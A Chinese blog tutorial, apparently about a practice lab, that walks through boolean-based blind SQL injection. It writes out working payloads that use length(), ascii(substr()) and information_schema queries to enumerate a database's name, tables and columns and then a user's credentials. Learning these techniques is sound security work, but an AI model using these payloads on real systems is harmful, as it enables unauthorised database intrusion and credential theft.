sql盲注

最新推荐文章于 2024-04-23 09:08:55 发布
最新推荐文章于 2024-04-23 09:08:55 发布
阅读量248 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44721672/article/details/89077391
版权

通过SQL注入的基础篇,我们掌握了在没有任何过滤的情况下而且还带有回显的位的注入
如何我们在注入的时候发现输入都是正确的,但是网页没办法回显出数据,而是回显是一个正常的网页或者说回显一个正确的网页没有报错呢。这就要基于SQL盲注了
SQL盲注分类:1,通过编码判断猜测数据(如:ASCII编码)

2,通过报错的形势显示出我们注入的数据

3,通过延迟的方式测试数据

在这里插入图片描述
查看源码,发现闭合是通过 ’ 闭合在这里插入图片描述
我们随后来个数据查询,发现注入语句并没有报错,网页也没有报错吗,但是不想基础篇那样有数据的显示位
首先判断现在有几个显示为 order by , 用5去判断发现报错,当我们用3 的时候就回显正确
在这里插入图片描述
在这里插入图片描述
猜测一下当前数据库的名字长度 id=1’ and length(database())=8 --+ (注:length()截取字符的长度函数),可以看到等于8是true真结果使用没有报错,使用当前数据的长度就为8

在这里插入图片描述
猜测当前数据的可以的名字,这里我们可以用ASCII编码去判断,当然也可以用其他编码或者正则表达式
id=1’ and ascii(substr(database(),1,1))=115 --+ , 在ASCII表中 115对应小写的 s,所以这数据库的第一位就为s,在测试的时候我们使用2分法会提高效率,一般使用32-126这个范围去猜测
注:(substr(“Hello world”,1,1); 第一个1代表从1位开始,后面的1代表取几个字符,SQL语句里面substr是从1开始,在php里面是从0位开始)在这里插入图片描述

猜解当前数据库有多少表,当等于4的时候没有正确回显说明当前数据库有4个表。(注:count()为记录条数的函数也称为统计函数)
?id=1’ and 1=((select count(*) from information_schema.tables where table_schema=‘security’)=4) 在这里插入图片描述
猜解没每个表的名字,首先猜长度通过构造下面语句获得第一个表的长度为6,用同样的方法猜出剩下的3个表的长度,分别为8,7,5
?id=1’ and length((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1))=6

在这里插入图片描述

猜解表名,猜出一个表的第一个字母为e,同样的用substr的方法猜出所有的表名在这里插入图片描述
?id=1’ and ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1))=101 --+
在这里插入图片描述
我们发现了想要的一个users表,然后去猜解users表里面有哪些列,我们还是从猜有多少个列开始,当我们等于3的时候没报错,确定当前表有3个列
?id=1’ and ((select count(*) from information_schema.columns where table_schema=‘security’ and table_name=‘users’)=3) --+
在这里插入图片描述
然后猜长度,猜名字,就和猜表的时候的动作一样只是在多 table_name=‘users’ 条件
?id=1’ and length((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘users’ limit 0,1))=2 --+
在这里插入图片描述
一步一步的猜测我们已经获得了我们想要的表的名字和列名,然后开始猜解里面的数据,一般这种带ID的ID=1或者说第一个用户
都是权限最高的,所以我们只需要得到这个权限最高的用户详细数据就OK了
猜第一个用户名的长度为4,密码长度也为4(注:这的密码是没加密的一般数据库的密码都是加密的都是很长的)
?id=1’ and length((select username from security.users where id =1))=4 --+

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

李志圆
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
SQL Injection (Blind)之盲注(原理、分类、利用)
weixin_51513059的博客
03-24 3509
SQL注入过程SQL语句执行后,选择的数据不能回显到前端页面,此时需要利用一些方法进行判断或者尝试,这个过程称之为盲注。在盲注,攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同,也可以是响 应时间不同)。一般情况下,盲注可分为两类:基于布尔的盲注(Boolean based)基于时间的盲注(Time based)
SQL注入2——盲注(重学)
qq_52263650的博客
11-07 3773
SQL注入2——布尔型盲注(重学)
sql注入(盲注
最新发布
2302_79119987的博客
04-23 1489
时间盲注又称延迟注入,其主要特征是利用sleep函数,制造时间延迟,由回显时间来判断是否报错。如果页面延迟五秒,说明正确。注入语句与布尔盲注相似,但是过程太繁琐一般使用自动化注入。可以使用脚本进行测:(使用时做出修改)# 将url 替换成你的靶场关卡网址# 修改两个对应的payload# 目标网址(不带参数)# 长度使用的payload# 枚举字符使用的payload(ascii(substr(,{n},1)) ={r})# 获取长度
SQL盲注
weixin_59872639的博客
02-18 2439
盲注SQL注入过程SQL语句执行后,选择的数据不能回显到前端页面,此时需要利用一些方法进行判断或者尝试,这个过程称之为盲注。 在盲注,攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同,也可以是响应时间不同)。一般情况下,盲注可分为两类: 基于布尔的盲注(Boolean based) 基于时间的盲注(Time based) 基于布尔的盲注 某些场合下,页面返回的结果只有两种(正常或错误) 。通过构造SQL判断语句,查看页面的返回结果(True or False)来判断哪些S
SQL注入-盲注(布尔盲注与时间盲注
LJH1999ZN的博客
02-10 1万+
一、什么是盲注 盲注就是在sql注入过程sql语句执行select之后,可能由于网站代码的限制或者apache等解析器配置了不回显数据,造成在select数据之后不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个判断的过程称之为盲注。 通俗的讲就是在前端页面没有显示位,不能返回sql语句执行错误的信息,输入正确和错误返回的信息都是一致的,这时候我们就需要使用页面的正常与不正常显示来进行sql注入。 二、盲注的分类 基于布尔类型的盲注 基于时间类型的盲注 三、利用盲注
SQL盲注(原理概述、分类)
热门推荐
小赵同学的博客
12-29 2万+
盲注原理 盲注的分类 盲注常用函数 盲注的利用方法 一、SQL盲注概述 1.如果数据库运行返回结果时只反馈对错不会返回数据库的信息 此时可以采用逻辑判断是否正确的盲注来获取信息。 2.盲注是不能通过直接显示的途径来获取数据库数据的方法。 盲注可以分为三类: 布尔盲注 时间盲注 报错型盲注 1、布尔盲注 盲注查询是不需要返回结果的,仅判断语句是否正常执行即可,所以其返回可以看到一个布尔值,正常显示为true,报错或者是其他不正常显示为False 查询语句: SELECT userid FROM ne
python编写的sql盲注
10-28
python编写的sql盲注
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
布尔盲注.py_sql盲注python_
10-03
在这个场景,我们关注的是一个名为"布尔盲注.py"的Python脚本,它显然是用于演示或执行SQL盲注的工具。 在SQL盲注,攻击者通常不能直接看到查询结果,而是必须依赖于应用程序对查询成功或失败的间接响应。例如...
SQL盲注medium.pdf
05-13
SQL盲注medium.pdf 本文档主要讲解SQL盲注的技术,使用DVWA Security平台进行演示,难度设置为medium。下面我们将对每一步操作进行详细的解释和知识点总结。 一、DVWA Security平台的使用 DVWA Security是一个...
多线程+二分法的巧用——通达OA SQL盲注1
08-03
【多线程+二分法在SQL盲注的应用——以通达OA为例】 SQL盲注SQL Blind Injection)是一种常见的网络安全漏洞,攻击者通过发送特定的SQL查询,利用服务器的响应时间或状态来推断数据库的信息。在这个案例,...
SQL注入之盲注
xiao_he0123的博客
03-20 6988
SQL注入之盲注前言一、盲注分类二、具体解析1.基于布尔的sql盲注首先要先了解一下sql注入截取字符串常用的函数:(1)mid()函数(2)substr()函数(3)left()函数具体注入方法2.基于时间的SQL盲注3.基于报错的SQL盲注1.extractvalue()函数2.uodatexml()函数3.floor()函数 前言 何为盲注盲注就是在 sql 注入过程sql 语句执行的选择后,选择的数据不能回显 到前端页面 一、盲注分类 盲注分为三类: (1)基于布尔的SQL盲注 (2)基于事
SQL盲注(布尔盲注
Dug123456_的博客
04-07 1118
flag有固定的格式,以右花括号结束,假设flag有小写英文字母、下划线、花括号构成,由于不知道flag长度,要一个无限循环,定义计数符j,内嵌循环i遍历小写、下划线和花括号,匹配到字符后j++,出循环的条件是当前i是右花括号,即flag结束。再大循环i次(遍历所有表),内嵌循环j次(表名的所有字符),i是表下标-1,j是字符下标,再内嵌循环k从a到z(假设表名全是小写英文字符)尝试获取每个表的表名。1 and length(database())=4 //判断数据库名字的长度是否为4。
SQL 盲注
VioletKiss
05-10 341
实验准备: DVWA漏洞演练平台,浏览器 1.检查漏洞是否存在 先把DVWA的level修改为low 正常输入1返回正常页面-_-|| 2.探测当前表的字段数 再选SQL Injection(Blind),在右侧输入 1 ' order by 10 --' ,语句的10可以用任意数字代替,探测字段数 3.测试数据库版本号
sql手工注入实战
mulincong的博客
05-30 2229
sql手工注入封神台靶场
sql注入——盲注
qq_33441500的博客
10-15 188
sql注入——盲注 一,盲注介绍 所谓盲注就是在服务器没有错误回显的时候完成注入攻击。 盲注分为布尔盲注和时间盲注 布尔盲注:boolean 根据注入信息返回true or fales 没有任何报错信息 时间盲注:界面返回值ture 无论输入任何值,返回的情况都是正常的来处。加入特定的时间函数,通过查看web页面返回的时间差来判断注入的语句是否正确。 二,盲注需要掌...
SQL布尔型盲注思路分析(入门必看)
Pz_mstr's Blog
08-18 7190
不知道,不清楚sql盲注?这里有你想要的
安装虚拟机
weixin_44721672的博客
03-09 86
1.浏览器下载破解版虚拟机后输入密钥 2.创建新的虚拟机 3.若对各种设备连接不熟悉则选择典型并进行下一步*4.点击稍后安装系统 5.选择windows点击下一步**6.选择位置点击下一步 **7.选择磁盘大小一般维为60G点击下一步**8.点击完成 9.基本完成可进选进行编辑虚拟机 ...
dvwa sql盲注高级
08-11
包含了多个不同类型的漏洞,包括 SQL 盲注SQL 盲注是一种利用 Web 应用程序存在的 SQL 注入漏洞来获取数据库信息的攻击技术。在 DVWA ,你可以通过以下步骤进行 SQL 盲注的高级练习: 1. 登录 DVWA:在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值